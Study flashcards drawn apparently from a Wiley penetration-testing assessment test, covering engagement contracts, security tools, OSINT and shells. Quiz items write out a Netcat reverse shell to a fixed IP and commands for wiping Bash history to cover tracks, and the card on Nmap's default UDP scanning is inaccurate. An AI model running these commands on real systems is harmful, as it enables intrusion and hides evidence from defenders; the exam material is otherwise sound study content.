Wiley - Assessment Test missed/items Flashcards
Ricky is conducting a penetration test against a web application and is looking for potential vulnerabilities to exploit. Which of the following vulnerabilities does not commonly exist in web applications?
- SQL injection
- VM escape
- Buffer overflow
- Cross‐site scripting
VM Escape
Web applications commonly experience SQL injection, buffer overflow, and cross‐site scripting vulnerabilities. Virtual machine (VM) escape attacks work against the hypervisor of a virtualization platform and are not generally exploitable over the web. You’ll learn more about all of these vulnerabilities in Chapters 5 and 9.
NDA
A nondisclosure agreement, or NDA, is a legal agreement that is designed to protect the confidentiality of the client’s data and other information that the penetration tester may encounter during the test.
SOW
An SOW is a statement of work, which defines what will be done during an engagement
MSA
An MSA is a master services agreement that sets the overall terms between two organizations (which then use SOWs to describe the actual work)
Noncompete
Noncompetes are just that—an agreement that prevents competition, usually by preventing an employee from working for a competitor for a period of time after their current job ends.
Chris is assisting Ricky with his penetration test and would like to extend the vulnerability search to include the use of dynamic testing. Which one of the following tools can he use as an interception proxy?
- ZAP
- Nessus
- SonarQube
- OllyDbg
The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing
ZAP
The Zed Attack Proxy (ZAP) from the Open Web Application Security Project (OWASP) is an interception proxy that is very useful in penetration testing
Nessus
Vulnerability Scanner
Nessus is designed to identify and report on potential vulnerabilities in computer systems, networks, and applications.
It performs this task by:
- scanning for open ports
- detecting services running on those ports
- testing those services for known vulnerabilities
SonarQube
SonarQube is a comprehensive code quality assurance tool designed to analyze and improve the quality, security, and maintainability of source code.SonarQube is a static software testing tool (SAST tool)
OllyDbg
OllyDbg is a powerful, user-friendly debugger and disassembler primarily designed for reverse engineering and debugging applications on Microsoft Windows
Renee is conducting a penetration test and discovers evidence that one of the systems she is exploring was already compromised by an attacker. What action should she take immediately after confirming her suspicions?
- Record the details in the penetration testing report.
- Remediate the vulnerability that allowed her to gain access.
- Report the potential compromise to the client.
- No further action is necessary because Renee’s scope of work is limited to penetration testing.
Report the potential compromise to the client.
Which of the following vulnerability scanning methods will provide the most accurate detail during a scan?
- Black box
- Authenticated
- Internal view
- External view
An authenticated, or credentialed, scan provides the most detailed view of the system. Black‐box assessments presume no knowledge of a system and would not have credentials or an agent to work with on the system. Internal views typically provide more detail than external views, but neither provides the same level of detail that credentials can allow.
Annie wants to cover her tracks after compromising a Linux system. If she wants to permanently remove evidence of the commands she inputs to a Bash shell, which of the following commands should she use?
- history -c
- kill -9 $$
- echo “” ˃ /~/.bash_history
- ln /dev/null ~/.bash_history -sf
ln /dev/null ~/.bash_history -sf
Although all of these commands are useful for covering her tracks, only linking /dev/null to .bash_history will prevent the Bash history file from containing anything.
Kaiden would like to perform an automated web application security scan of a new system before it is moved into production. Which one of the following tools is best suited for this task?
- Nmap
- Nikto
- Wireshark
- CeWL
Nikto
Nikto
open-source web server scanner designed to identify and report on potential vulnerabilities and misconfigurations in web servers.
CeWL
The Custom Wordlist Generator (CeWL) is used to spider websites for keywords
Wireshark
Wireshark is a powerful, free, and open-source network protocol analyzer that is widely used for capturing, displaying, and analyzing network traffic
Steve is engaged in a penetration test and is gathering information without actively scanning or otherwise probing his target. What type of information is he gathering?
- OSINT
- HSI
- Background
- None of the above
OSINT, or open source intelligence, is information that can be gathered passively. Passive information gathering is useful because it is not typically visible to targets and can provide valuable information about systems, networks, and details that guide the active portion of a penetration test
Which of the following activities constitutes a violation of integrity?
- Systems were taken offline, resulting in a loss of business income.
- Sensitive or proprietary information was changed or deleted.
- Protected information was accessed or exfiltrated.
- Sensitive personally identifiable information was accessed or exfiltrated.
Sensitive or proprietary information was changed or deleted
Integrity breaches involve data being modified or deleted. When systems are taken offline it is an availability issue, protected information being accessed might be classified as a breach of proprietary information, and sensitive personally identifiable information access would typically be classified as a privacy breach.
Ted wants to scan a remote system using Nmap and uses the following command:
nmap 149.89.80.0/24
How many TCP ports will he scan?
- 256
- 1,000
- 1,024
- 65,535
By default, Nmap will scan the 1,000 most common ports for both TCP and UDP
Brian is conducting a thorough technical review of his organization’s web servers. He is specifically looking for signs that the servers may have been breached in the past. What term best describes this activity?
- Penetration testing
- Vulnerability scanning
- Remediation
- Threat hunting
Threat hunting
Threat hunting uses the attacker mindset to search the organization’s technology infrastructure for the artifacts of a successful attack. Threat hunters ask themselves what a hacker might do and what type of evidence they might leave behind and then go in search of that evidence. Brian’s activity clearly fits this definition.
Liam executes the following command on a compromised system:
nc 10.1.10.1 7337 -e /bin/sh
What has he done?
- Started a reverse shell using Netcat
- Captured traffic on the Ethernet port to the console via Netcat
- Set up a bind shell using Netcat
- None of the above
Started a reverse shell using Netcat
Liam has used Netcat to set up a reverse shell. This will connect to 10.1.10.1 on port 7337 and connect it to a Bash shell
Reverse Shell
A reverse shell is a type of cyber attack that allows an attacker to gain remote access to a victim’s machine by establishing a connection from the victim’s system back to the attacker’s system. This method circumvents traditional security measures, such as firewalls, which often filter incoming connections but may allow outgoing connections more freely.
How Reverse Shells Work
1. Connection Initiation: In a reverse shell scenario, the victim’s machine initiates an outbound connection to the attacker’s machine. This is in contrast to a traditional bind shell, where the attacker connects directly to the victim’s machine.
2. Exploitation: Attackers typically exploit vulnerabilities in applications or use social engineering techniques (such as phishing) to execute malicious scripts on the victim’s system. Once executed, these scripts create a connection back to the attacker’s server.
3. Command Execution: After the connection is established, the attacker can send commands to be executed on the victim’s machine, effectively gaining control over it as if they were physically present.
Netcat is often used with reverse shells
Bind Shell
A bind shell is a type of network shell that allows an attacker to connect to a target machine by establishing a listening service on that machine. Here are the key aspects of bind shells:
Definition
A bind shell listens on a specific port for incoming connections. Once a connection is established, it provides the connecting user with a command-line interface (shell) on the target system, allowing them to execute commands remotely.
How Bind Shells Work
* Listening Service: The target machine runs a service (often created using tools like Netcat or custom scripts) that listens on a designated port for incoming connections.
* Connection Initiation: The attacker connects to this listening port from their own machine, effectively gaining access to the shell of the target system.
* Command Execution: Once connected, the attacker can execute commands as if they were physically present at the target machine.
Use Cases
* Remote Administration: Bind shells can be used legitimately by system administrators for remote management of servers and devices. They allow administrators to perform tasks such as monitoring system performance, updating software, and managing configurations.
* Malicious Activity: Attackers may use bind shells to gain unauthorized access to systems, execute commands, and potentially install malware.
Security Implications
Exposure Risk: Since bind shells listen for incoming connections, they can expose the target machine to unauthorized access if not properly secured. If an attacker discovers an open port, they can connect and take control of the system.
Firewall Challenges: Many firewalls block incoming connections by default, making bind shells less effective in environments with strict security measures. This limitation often leads attackers to prefer reverse shells instead.